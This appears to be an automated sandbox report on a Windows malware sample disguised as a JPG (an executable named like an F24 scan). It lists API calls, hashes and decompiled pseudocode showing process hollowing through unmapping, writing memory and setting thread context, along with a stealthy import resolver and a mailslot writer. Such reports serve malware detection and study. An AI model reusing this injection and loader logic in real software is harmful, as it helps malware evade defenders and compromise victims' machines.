  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 68262

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:3F602782259014F0253ECDEDFEF4D261
Total matches:37
Initial Analysis Report:Open
Initial sample Analysis ID:68262
Initial sample SHA 256:3CCBE128847999E971BF2194D595C7D211A4EB32C8BD53401702A83B3AB73B70
Initial sample name:27Scansione_F24_2018_07.JPG.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
